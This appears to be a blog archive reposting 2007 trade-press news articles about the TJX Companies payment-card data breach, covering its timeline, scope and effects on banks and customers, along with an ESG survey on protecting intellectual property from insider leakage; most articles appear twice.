Twenty-four percent of respondents pointed to malicious insiders as the biggest threat to their IP falling into the wrong hands, while 34 percent feared that the problem lies with negligent insiders— Employees who just want to do their jobs but don't understand the risk of IP stored on their laptops, for example.
Only 20 percent of respondents think that hackers are their biggest threat in this regard. The balance of threats is seen as coming from lack of security oversight (17 percent) or lack of distribution control (5 percent).
The ESG report puts forth four best practices for leakage protection.
First, ESG recommends enterprises define comprehensive requirements for IP and PII at the same time. Protecting against leakage of one protects against leakage of the other, the company maintains.
It's also necessary to segregate IP protection duties, according to ESG. That means empowering security teams to provide independent oversight of operations, including monitoring insider use of information.
ESG also suggests automating discovery of IP, to cut down on the time and money currently being devoted to discovery.
Finally, ESG recommends network-based solutions over distributed endpoint software. "I don't think endpoint software is going to solve it—it can't reside in all the places IP resides," Ogren said.
May 7, 2007
By Lisa Vaas
In the wake of incidents such as the TJX Companies' massive data breach, reported in January, it shouldn't come as a surprise to find that 90 percent of companies plan to plug in new technology to secure electronic copies of intellectual property in the coming year.
The ESG survey—sponsored by information protection company Reconnex—is the first in a quarterly series on the topic.
One of the findings that surprised ESG was how big the IP problem is, according to Eric Ogren, a security analyst for ESG, in Milford, Mass.
Top priorities
Protecting PII(personally identifiable information) such as credit card numbers and Social Security numbers is not actually the top priority with most organizations, Ogren said.
"We asked upfront, 'What do you consider to be intellectual property?'" he said. "What they want to protect is financial information, contracts and agreements. Only after that is PII."
Other IP that companies are looking to protect include—in order of reported priority—source code, competitive intelligence, internal research data, design specifications, customers' PII, trade secrets, CRM (customer relationship management) databases and patent documents.
What's tough about protecting such data is that it comes in so many different forms. Much of it doesn't fit into a neat fixed format, as would Social Security numbers or credit card numbers, for example. Instead, it comes from all over the network).
"If you think e-mail is your only issue, you're only solving 20 percent of the problem," Ogren said.
Tremendous resources are being spent to search for networked IP, Ogren added, in terms of both manual and automated procedures. According to the report, 78 percent of those surveyed search for electronic versions of IP at least once per quarter.
"[This] is a major investment of time and resources," Ogren said. "It's in many different forms, in many different places, communicated with many different protocols."
As for the biggest perceived threat when it comes to data loss, malicious or sloppy insiders scare survey respondents the most.
Twenty-four percent of respondents pointed to malicious insiders as the biggest threat to their IP falling into the wrong hands, while 34 percent feared that the problem lies with negligent insiders— Employees who just want to do their jobs but don't understand the risk of IP stored on their laptops, for example.
Only 20 percent of respondents think that hackers are their biggest threat in this regard. The balance of threats is seen as coming from lack of security oversight (17 percent) or lack of distribution control (5 percent).
The ESG report puts forth four best practices for leakage protection.
First, ESG recommends enterprises define comprehensive requirements for IP and PII at the same time. Protecting against leakage of one protects against leakage of the other, the company maintains.
It's also necessary to segregate IP protection duties, according to ESG. That means empowering security teams to provide independent oversight of operations, including monitoring insider use of information.
ESG also suggests automating discovery of IP, to cut down on the time and money currently being devoted to discovery.
Finally, ESG recommends network-based solutions over distributed endpoint software. "I don't think endpoint software is going to solve it—it can't reside in all the places IP resides," Ogren said.
Labels: TJX Companies Inc.
Sunday, March 04, 2007
TJX Data Breach Worse Than Initially Reported
TJX Data Breach Worse Than Initially Reported
Jaikumar Vijayan
February 26, 2007 (Computerworld)
The massive data breach disclosed last month by The TJX Companies Inc. was far worse than first reported, the company said last week.
An ongoing internal investigation into the breach has shown that intruders gained access to TJX’s systems in July 2005, almost a full year earlier than first thought.
The investigation has also found that card transaction data from TJX-owned stores in the U.K and Ireland were affected by the intrusion, the company acknowledged. Previously, TJX had said only that it was “concerned” that the breach may have extended to those countries.
“We are dedicating substantial resources to investigating and evaluating the intrusion,” TJX CEO Carol Meyrowitz said in a statement. More than 50 experts from IBM and General Dynamics Corp., hired by TJX to shore up security in the wake of the breach, are investigating the incident, Meyrowitz said.
TJX, owner of retail chains TJ Maxx, Marshalls and Bob’s Stores, last month revealed that someone had illegally accessed a payment system and made off with card data belonging to customers in the U.S., Canada and Puerto Rico and possibly in the U.K. and Ireland. At the time, the company said the breach had occurred in May 2006.
TJX hasn’t disclosed how many shoppers may have been affected by the breach. Some analysts believe the number could be in the millions.
Avivah Litan, an analyst at Gartner Inc., said the latest update by TJX could mean that officials are getting closer to finding the perpetrators.
“I think they have pinpointed [the intruders] to a large degree and may have found files indicating that 2005 [card] data was stolen,” she said.
TJX’s latest disclosure is not all that surprising and points to a broad lack of internal data controls at many large companies, security analysts said.
“When it comes right down to it, very few companies have effective controls to monitor internal systems closely and follow the movement of data” on their networks, said Alex Bakman, CEO of Ecora Software Corp., a Portsmouth, N.H.-based maker of compliance software. Therefore, such breaches can go unnoticed for a long time, he said.
“The underlying problem is that companies are treating security as a ‘nice to have’ as opposed to a ‘must have,’” Bakman said.
“TJX is just the tip of the iceberg. I think we are going to see many more” such disclosures, he added. “It’s going to get a lot uglier before it gets any better.”
Joel Rosen, CEO of security vendor Tizor Systems Inc. in Maynard, Mass., said, “Many companies that relied on traditional security are just coming to terms with the fact that beefing up existing systems is not the answer.”
The fallout from the breach has been widespread as U.S. and Canadian banks and credit unions have been forced to block and reissue thousands of cards. The New Hampshire Bankers Association has estimated that 20% to 30% of New England residents may have been affected by the breach.
Jaikumar Vijayan
February 26, 2007 (Computerworld)
The massive data breach disclosed last month by The TJX Companies Inc. was far worse than first reported, the company said last week.
An ongoing internal investigation into the breach has shown that intruders gained access to TJX’s systems in July 2005, almost a full year earlier than first thought.
The investigation has also found that card transaction data from TJX-owned stores in the U.K and Ireland were affected by the intrusion, the company acknowledged. Previously, TJX had said only that it was “concerned” that the breach may have extended to those countries.
“We are dedicating substantial resources to investigating and evaluating the intrusion,” TJX CEO Carol Meyrowitz said in a statement. More than 50 experts from IBM and General Dynamics Corp., hired by TJX to shore up security in the wake of the breach, are investigating the incident, Meyrowitz said.
TJX, owner of retail chains TJ Maxx, Marshalls and Bob’s Stores, last month revealed that someone had illegally accessed a payment system and made off with card data belonging to customers in the U.S., Canada and Puerto Rico and possibly in the U.K. and Ireland. At the time, the company said the breach had occurred in May 2006.
TJX hasn’t disclosed how many shoppers may have been affected by the breach. Some analysts believe the number could be in the millions.
Avivah Litan, an analyst at Gartner Inc., said the latest update by TJX could mean that officials are getting closer to finding the perpetrators.
“I think they have pinpointed [the intruders] to a large degree and may have found files indicating that 2005 [card] data was stolen,” she said.
TJX’s latest disclosure is not all that surprising and points to a broad lack of internal data controls at many large companies, security analysts said.
“When it comes right down to it, very few companies have effective controls to monitor internal systems closely and follow the movement of data” on their networks, said Alex Bakman, CEO of Ecora Software Corp., a Portsmouth, N.H.-based maker of compliance software. Therefore, such breaches can go unnoticed for a long time, he said.
“The underlying problem is that companies are treating security as a ‘nice to have’ as opposed to a ‘must have,’” Bakman said.
“TJX is just the tip of the iceberg. I think we are going to see many more” such disclosures, he added. “It’s going to get a lot uglier before it gets any better.”
Joel Rosen, CEO of security vendor Tizor Systems Inc. in Maynard, Mass., said, “Many companies that relied on traditional security are just coming to terms with the fact that beefing up existing systems is not the answer.”
The fallout from the breach has been widespread as U.S. and Canadian banks and credit unions have been forced to block and reissue thousands of cards. The New Hampshire Bankers Association has estimated that 20% to 30% of New England residents may have been affected by the breach.
Labels: TJX Companies Inc.
Wednesday, February 14, 2007
TJX breach occurred seven months before it was detected
TJX breach occurred seven months before it was detected
Jaikumar Vijayan
January 22, 2007 (Computerworld) The data breach at TJX Cos. that exposed sensitive credit and debit card data on an unknown number of customers occurred nearly seven months before it was detected, a company spokeswoman said today.
The breach occurred as far back as mid-May 2006 but was discovered only in mid-December, said company spokeswoman Debra McConnell. The original statement from Framingham, Mass.-based TJX announcing the data compromise last week mentioned only the discovery of the breach in December and made no reference to when the breach actually happened.
McConnell said the decision not to mention when the breach happened did not represent an "inconsistency" in the company's public reporting of the incident. "We had said in our press release that we had discovered the breach in mid-December but we did not put in when it occurred," she said.
McConnell did not provide details on the scope of the breach but reiterated the company's earlier statement that credit and debit card information belonging to "a limited number" of individuals had been stolen from the compromised system. "And by 'limited' we mean substantially less than millions," she said.
Meanwhile, a Canadian law firm, the Merchant Law Group, filed a class-action lawsuit against Winners and HomeSense, two TJX-owned retailers in Canada whose customers were affected by the breach.
The lawsuit was filed in courts in six Canadian provinces and seeks "financial recovery on behalf of all individuals for whom personal information has been revealed," a statement posted on the company's Web site said.
"There's a variety of issues, from the negligence of these companies to protect credit-card information to issues of violations of privacy legislation and other legislation that protect personal information in Canada," said Evatt Merchant a partner at the law firm.
"In terms of corrective action, there would have to be safeguards to make sure this didn't happen again, and damages have to be assessed on a classwide basis, though obviously that is something that is a bit downstream," right now, he said. He added that public response to the lawsuits has been "significant."
McConnell said TJX had no comment on the lawsuit.
TJX said last Wednesday that an "unauthorized intruder" had gained access to its system and may have stolen credit and debit card data belonging to an unspecified number of customers in the U.S., Canada and Puerto Rico, and possibly in the U.K. and Ireland.
The retailer, which owns discount retail chains including TJ Maxx, Marshalls and Bob's Stores, didn't disclose the number of shoppers that may have been affected by the breach, saying that the full extent of the data theft "is not yet known."
The compromised data included so-called Track 2 data taken from the magnetic stripes on the back of credit and debit cards. Track 2 data includes account numbers, expiration dates and encrypted personal identification numbers, plus other information that card-issuing banks can include at their discretion. The storage of such information by retailers is forbidden under the Payment Card Industry (PCI) data security standard rules being pushed by the major credit card companies.
So far, about 50 banks in Massachusetts alone have been affected by the TJX breach, according to a spokesman at the Massachusetts Bankers Association.
Ryan Fisher, senior risk manager at Madison, Wis.-based CUNA Mutual Group, which insures about 5,500 credit unions, said that while the scope of the breach is unknown, it appears to have had an impact on a substantial number of credit unions as well.
"The sense is that it is widespread," he said. "We do see multiple credit unions in different regions impacted," he said.
The fact that some of the compromised data included Track 2 data is very disappointing, he said. There is also a "certain level of disappointment" that credit card companies have not been enforcing the standards more effectively, he said.
Jaikumar Vijayan
January 22, 2007 (Computerworld) The data breach at TJX Cos. that exposed sensitive credit and debit card data on an unknown number of customers occurred nearly seven months before it was detected, a company spokeswoman said today.
The breach occurred as far back as mid-May 2006 but was discovered only in mid-December, said company spokeswoman Debra McConnell. The original statement from Framingham, Mass.-based TJX announcing the data compromise last week mentioned only the discovery of the breach in December and made no reference to when the breach actually happened.
McConnell said the decision not to mention when the breach happened did not represent an "inconsistency" in the company's public reporting of the incident. "We had said in our press release that we had discovered the breach in mid-December but we did not put in when it occurred," she said.
McConnell did not provide details on the scope of the breach but reiterated the company's earlier statement that credit and debit card information belonging to "a limited number" of individuals had been stolen from the compromised system. "And by 'limited' we mean substantially less than millions," she said.
Meanwhile, a Canadian law firm, the Merchant Law Group, filed a class-action lawsuit against Winners and HomeSense, two TJX-owned retailers in Canada whose customers were affected by the breach.
The lawsuit was filed in courts in six Canadian provinces and seeks "financial recovery on behalf of all individuals for whom personal information has been revealed," a statement posted on the company's Web site said.
"There's a variety of issues, from the negligence of these companies to protect credit-card information to issues of violations of privacy legislation and other legislation that protect personal information in Canada," said Evatt Merchant a partner at the law firm.
"In terms of corrective action, there would have to be safeguards to make sure this didn't happen again, and damages have to be assessed on a classwide basis, though obviously that is something that is a bit downstream," right now, he said. He added that public response to the lawsuits has been "significant."
McConnell said TJX had no comment on the lawsuit.
TJX said last Wednesday that an "unauthorized intruder" had gained access to its system and may have stolen credit and debit card data belonging to an unspecified number of customers in the U.S., Canada and Puerto Rico, and possibly in the U.K. and Ireland.
The retailer, which owns discount retail chains including TJ Maxx, Marshalls and Bob's Stores, didn't disclose the number of shoppers that may have been affected by the breach, saying that the full extent of the data theft "is not yet known."
The compromised data included so-called Track 2 data taken from the magnetic stripes on the back of credit and debit cards. Track 2 data includes account numbers, expiration dates and encrypted personal identification numbers, plus other information that card-issuing banks can include at their discretion. The storage of such information by retailers is forbidden under the Payment Card Industry (PCI) data security standard rules being pushed by the major credit card companies.
So far, about 50 banks in Massachusetts alone have been affected by the TJX breach, according to a spokesman at the Massachusetts Bankers Association.
Ryan Fisher, senior risk manager at Madison, Wis.-based CUNA Mutual Group, which insures about 5,500 credit unions, said that while the scope of the breach is unknown, it appears to have had an impact on a substantial number of credit unions as well.
"The sense is that it is widespread," he said. "We do see multiple credit unions in different regions impacted," he said.
The fact that some of the compromised data included Track 2 data is very disappointing, he said. There is also a "certain level of disappointment" that credit card companies have not been enforcing the standards more effectively, he said.
Labels: TJX Companies Inc.
Sunday, January 21, 2007
Retailer TJX reports computer hack
Retailer TJX reports computer hack
The extent of the breach of TJX Companies’ network is still unclear
By Ellen Messmer, Network World, 01/18/07
Framingham, Mass.-based retailer TJX Companies, which operates T.J. Maxx, Marshalls and other stores, warned customers that its computer network has been broken into, compromising customer credit-card information and other data.
In a letter posted on the TJX Web site today, company founder and chairman Ben Cammarata wrote of his disappointment about the discovery of the unauthorized intrusion into the company’s network, and said an investigation is ongoing to understand its consequences more fully. TJX has set up toll-free phone numbers in the United States, Canada, the United Kingdom and Ireland to take questions from customers about the security incident.
“I can tell you that we were extremely disappointed when we determined that we have suffered an unauthorized intrusion into our computer systems that process and store information related to customer transactions,” Cammarata stated in the public letter. He noted: “While there is much we still have yet to understand about this issue, I can assure you that we are taking steps to safeguard confidential information and working closely with law enforcement in the U.S., Canada and the U.K. so that those responsible for this act will be brought to justice.”
In a separate statement, TJX said it discovered the intrusion into its systems for processing credit, debit and returns in mid-December 2006 and immediately notified law enforcement. TJX added that “it immediately engaged General Dynamics and IBM,” hiring them to “monitor and evaluate the intrusion, assess possible data compromise, and seek to identify affected information.” The two vendors are also expected to help TJX upgrade its systems.
TJX so far has determined that the intrusion involves computers pertaining to its T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the United States and Puerto Rico, and its Winners and HomeSense stores in Canada. While it has not yet confirmed further penetration in its network, TJX suspects intruders also may have breached systems related to its T.K. Maxx Stores in the United Kingdom. and Ireland and its Bob’s Stores in the United States.
As part of the statement, TJX also noted the company “does not yet have enough information to estimate the extent of the financial cost it will incur as a result of the situation.”
The extent of the breach of TJX Companies’ network is still unclear
By Ellen Messmer, Network World, 01/18/07
Framingham, Mass.-based retailer TJX Companies, which operates T.J. Maxx, Marshalls and other stores, warned customers that its computer network has been broken into, compromising customer credit-card information and other data.
In a letter posted on the TJX Web site today, company founder and chairman Ben Cammarata wrote of his disappointment about the discovery of the unauthorized intrusion into the company’s network, and said an investigation is ongoing to understand its consequences more fully. TJX has set up toll-free phone numbers in the United States, Canada, the United Kingdom and Ireland to take questions from customers about the security incident.
“I can tell you that we were extremely disappointed when we determined that we have suffered an unauthorized intrusion into our computer systems that process and store information related to customer transactions,” Cammarata stated in the public letter. He noted: “While there is much we still have yet to understand about this issue, I can assure you that we are taking steps to safeguard confidential information and working closely with law enforcement in the U.S., Canada and the U.K. so that those responsible for this act will be brought to justice.”
In a separate statement, TJX said it discovered the intrusion into its systems for processing credit, debit and returns in mid-December 2006 and immediately notified law enforcement. TJX added that “it immediately engaged General Dynamics and IBM,” hiring them to “monitor and evaluate the intrusion, assess possible data compromise, and seek to identify affected information.” The two vendors are also expected to help TJX upgrade its systems.
TJX so far has determined that the intrusion involves computers pertaining to its T.J. Maxx, Marshalls, HomeGoods and A.J. Wright stores in the United States and Puerto Rico, and its Winners and HomeSense stores in Canada. While it has not yet confirmed further penetration in its network, TJX suspects intruders also may have breached systems related to its T.K. Maxx Stores in the United Kingdom. and Ireland and its Bob’s Stores in the United States.
As part of the statement, TJX also noted the company “does not yet have enough information to estimate the extent of the financial cost it will incur as a result of the situation.”
Labels: TJX Companies Inc.
Friday, January 19, 2007
Massive Security Breach Reveals Credit Card Data
Jan 18, 2007
Massive Security Breach Reveals Credit Card Data
The TJX Companies, a large retailer that operates more than 2,000 retail stores under brands such as Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx and A.J. Wright, said on Wednesday that it suffered a massive computer breach on a portion of its network that handles credit card, debit card, check and merchandise transactions in the United States and abroad.
The company does not know the extent of the breach, which was first discovered in December 2006. However, hackers may have made off with credit and debit information from transactions in the United States, Canada and Puerto Rico in 2003 as well as transactions between May and December 2006, according to a company statement.
Banking officials in Massachusetts say the TJX breach is behind a recent warning by Visa to banks in Massachusetts, which have contacted customers in recent days and had to reissue thousands of ATM and debit cards. In the end, the hack may affect a wide range of credit card companies and thousands of consumers in America and in countries like the United Kingdom and Ireland, experts say.
TJX said it is working with IBM and General Dynamics to investigate the breach, which is believed to have occurred on computer systems that process and store information on customer transactions for T.J. Maxx, Marshalls, HomeGoods and A.J. Wright. Transactions from T.K. Maxx in the United Kingdom and Ireland may have also been exposed in the breach.
TJX said it knows of "a limited number of credit card and debit card holders whose information was removed from the system," and has provided that information to credit card companies. TJX is also working with law enforcement, including the U.S. Department of Justice, U.S. Secret Service and Royal Canadian Mounted Police, TJX said in its statement.
The company said it does not yet have enough information to determine the extent of the breach or what other customer information may have been compromised, nor can it quantify the financial impact of the breach.
Between eight and 10 Massachusetts banks have already had customers whose accounts were raided as a result of the breach. Those banks have had to reissue debit cards in response, said Bruce Spitzer, director of communications at the Massachusetts Bankers Association (MBA).
However, the MBA is still surveying its membership of 205 banks and credit unions. The effect of the TJX hack could be much wider and international in scope, he said.
Fitchburg Savings Bank in Fitchburg, Mass., has had to reissue 1,300 cards to customers whose account information was stolen, said Linda Racine, an executive vice president at the bank.
Fitchburg Savings was contacted by Visa on Monday night about the compromised customer accounts. However, the credit card company would not reveal the identity of the retailer that was the source of the breach, citing company rules, Racine said.
Fitchburg savings has sent letters to customers and reissued cards for affected accounts. However, no Fitchburg Savings customers appear to have been victims of fraud so far, she said.
The TJX breach recalls other recent hacks, including BJ’s wholesale club and another, reportedly at OfficeMax in 2005. Those breaches, as well as incidents like the hacking of card processor Card Systems, prompted the payment card industry to issue new rules, dubbed the PCI, about how sensitive data is stored and transmitted on internal systems.
However, Spitzer of the MBA said that banks still bore the brunt of security breaches at retailers because they have to pay to reissue cards to customers and absorb the financial losses from unauthorized account withdrawals. Small banks and credit unions often have trouble absorbing those costs, though they are not at fault in the breach itself, Spitzer said.
Spitzer took issue with the delay between the time TJX learned of the breach and when his organization and banks were notified as well as with Visa’s policy of keeping the source of the breach a secret.
"We would have liked to know sooner," he said.
MBA is working with state and federal lawmakers to hold card companies and retailers more accountable for the costs of security lapses, he said.
-Paul F. Roberts, InfoWorld
Massive Security Breach Reveals Credit Card Data
The TJX Companies, a large retailer that operates more than 2,000 retail stores under brands such as Bob’s Stores, HomeGoods, Marshalls, T.J. Maxx and A.J. Wright, said on Wednesday that it suffered a massive computer breach on a portion of its network that handles credit card, debit card, check and merchandise transactions in the United States and abroad.
The company does not know the extent of the breach, which was first discovered in December 2006. However, hackers may have made off with credit and debit information from transactions in the United States, Canada and Puerto Rico in 2003 as well as transactions between May and December 2006, according to a company statement.
Banking officials in Massachusetts say the TJX breach is behind a recent warning by Visa to banks in Massachusetts, which have contacted customers in recent days and had to reissue thousands of ATM and debit cards. In the end, the hack may affect a wide range of credit card companies and thousands of consumers in America and in countries like the United Kingdom and Ireland, experts say.
TJX said it is working with IBM and General Dynamics to investigate the breach, which is believed to have occurred on computer systems that process and store information on customer transactions for T.J. Maxx, Marshalls, HomeGoods and A.J. Wright. Transactions from T.K. Maxx in the United Kingdom and Ireland may have also been exposed in the breach.
TJX said it knows of "a limited number of credit card and debit card holders whose information was removed from the system," and has provided that information to credit card companies. TJX is also working with law enforcement, including the U.S. Department of Justice, U.S. Secret Service and Royal Canadian Mounted Police, TJX said in its statement.
The company said it does not yet have enough information to determine the extent of the breach or what other customer information may have been compromised, nor can it quantify the financial impact of the breach.
Between eight and 10 Massachusetts banks have already had customers whose accounts were raided as a result of the breach. Those banks have had to reissue debit cards in response, said Bruce Spitzer, director of communications at the Massachusetts Bankers Association (MBA).
However, the MBA is still surveying its membership of 205 banks and credit unions. The effect of the TJX hack could be much wider and international in scope, he said.
Fitchburg Savings Bank in Fitchburg, Mass., has had to reissue 1,300 cards to customers whose account information was stolen, said Linda Racine, an executive vice president at the bank.
Fitchburg Savings was contacted by Visa on Monday night about the compromised customer accounts. However, the credit card company would not reveal the identity of the retailer that was the source of the breach, citing company rules, Racine said.
Fitchburg savings has sent letters to customers and reissued cards for affected accounts. However, no Fitchburg Savings customers appear to have been victims of fraud so far, she said.
The TJX breach recalls other recent hacks, including BJ’s wholesale club and another, reportedly at OfficeMax in 2005. Those breaches, as well as incidents like the hacking of card processor Card Systems, prompted the payment card industry to issue new rules, dubbed the PCI, about how sensitive data is stored and transmitted on internal systems.
However, Spitzer of the MBA said that banks still bore the brunt of security breaches at retailers because they have to pay to reissue cards to customers and absorb the financial losses from unauthorized account withdrawals. Small banks and credit unions often have trouble absorbing those costs, though they are not at fault in the breach itself, Spitzer said.
Spitzer took issue with the delay between the time TJX learned of the breach and when his organization and banks were notified as well as with Visa’s policy of keeping the source of the breach a secret.
"We would have liked to know sooner," he said.
MBA is working with state and federal lawmakers to hold card companies and retailers more accountable for the costs of security lapses, he said.
-Paul F. Roberts, InfoWorld
Labels: TJX Companies Inc.
